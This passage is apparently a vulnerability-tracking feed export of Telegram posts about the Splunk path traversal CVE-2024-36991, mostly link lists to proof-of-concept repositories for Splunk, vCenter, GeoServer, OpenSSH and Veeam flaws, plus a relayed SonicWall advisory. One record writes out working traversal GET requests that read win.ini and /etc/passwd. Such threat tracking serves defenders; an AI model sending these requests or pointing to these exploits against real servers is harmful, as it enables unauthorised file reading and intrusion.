Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:42.000000Z"}, {"uuid": "cb472a49-fddd-4c8e-9ee9-0f7a4be468b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2152", "content": "CVE-2024-36991\n*\nSplunk  /etc/passwd\n*\nexploit", "creation_timestamp": "2024-07-06T07:49:45.000000Z"}, {"uuid": "b5af17f2-28d8-478b-be24-8839fe2c4abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6918", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "d6cf6579-ece5-4f4d-87c9-1f9c097f2ec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/true_secator/6008", "content": "SonicWall \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Splunk Enterprise, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430 GitHub \u0431\u044b\u043b \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d PoC, \u0447\u0442\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u0440\u0438\u0441\u043a \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u043d\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 GET.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-36991 \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,5 \u0438 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438, \u0432\u043b\u0438\u044f\u044e\u0449\u0430\u044f \u043d\u0430 Splunk Enterprise \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows \u0434\u043e 9.2.2, 9.1.5 \u0438 9.0.10.\u00a0Splunk \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0438\u043b\u0430 \u0435\u0435 1 \u0438\u044e\u043b\u044f.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043d\u0430 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435 /modules/messaging/, \u0435\u0441\u043b\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d Splunk Web.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0442\u0435\u043c, \u0447\u0442\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u044f Python\u00a0os.path.join\u00a0\u0443\u0434\u0430\u043b\u044f\u0435\u0442 \u0431\u0443\u043a\u0432\u0443 \u0434\u0438\u0441\u043a\u0430 \u0438\u0437 \u0442\u043e\u043a\u0435\u043d\u043e\u0432 \u043f\u0443\u0442\u0438, \u0435\u0441\u043b\u0438 \u0434\u0438\u0441\u043a \u0432 \u0442\u043e\u043a\u0435\u043d\u0435 \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u0434\u0438\u0441\u043a\u043e\u043c \u0432 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c \u043f\u0443\u0442\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SonicWall, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-36991 \u0434\u043b\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u043d\u0430 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0444\u0430\u0439\u043b\u0430\u043c \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 GET \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Splunk \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c Splunk Web \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u043c\u0435\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0438\u043b\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e \u0441\u0435\u0442\u044c.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SonicWall, \u0432 \u0441\u0435\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0431\u043e\u043b\u0435\u0435 220 000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432, \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f CVE-2024-36991.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c PoC \u0438 \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u044c \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b Splunk Enterprise \u0438\u043b\u0438 \u0436\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c Splunk Web.", "creation_timestamp": "2024-07-23T12:32:04.000000Z"}, {"uuid": "717dc267-2257-4cd4-a22d-c9f595ae4b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/haccking/11042", "content": "CVE-2024-36991\n\n#cve #exploit\n\n\u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-36991: \u043e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 Splunk Enterprise \u0432 Windows \u0432\u0435\u0440\u0441\u0438\u0439 \u043d\u0438\u0436\u0435 9.2.2, 9.1.5 \u0438 9.0.10. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b Splunk /etc/passwd.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | \u041a\u0443\u0440\u0441\u044b | \u041c\u0435\u043c\u044b\n\n#\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\n#\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438", "creation_timestamp": "2024-07-14T10:35:09.000000Z"}, {"uuid": "8ffddf39-d9fa-48ac-89ea-b0a932209867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25267", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:50.000000Z"}, {"uuid": "febf9935-9b5f-4c18-9d77-077df7c96a4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/CiyO7yHlQyQc7_ZHlNUUDNT8pEDVPJtVd9vkAk_eCKafKM_GYA", "content": "", "creation_timestamp": "2024-07-20T09:00:47.000000Z"}, {"uuid": "53ca7d54-f82b-4ac7-9efb-7eb032ed711d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2763", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:26:51.000000Z"}, {"uuid": "7b6d234f-15c3-4b98-bf90-d8ed1d609ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10795", "content": "#exploit\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401", "creation_timestamp": "2024-07-08T03:16:55.000000Z"}]}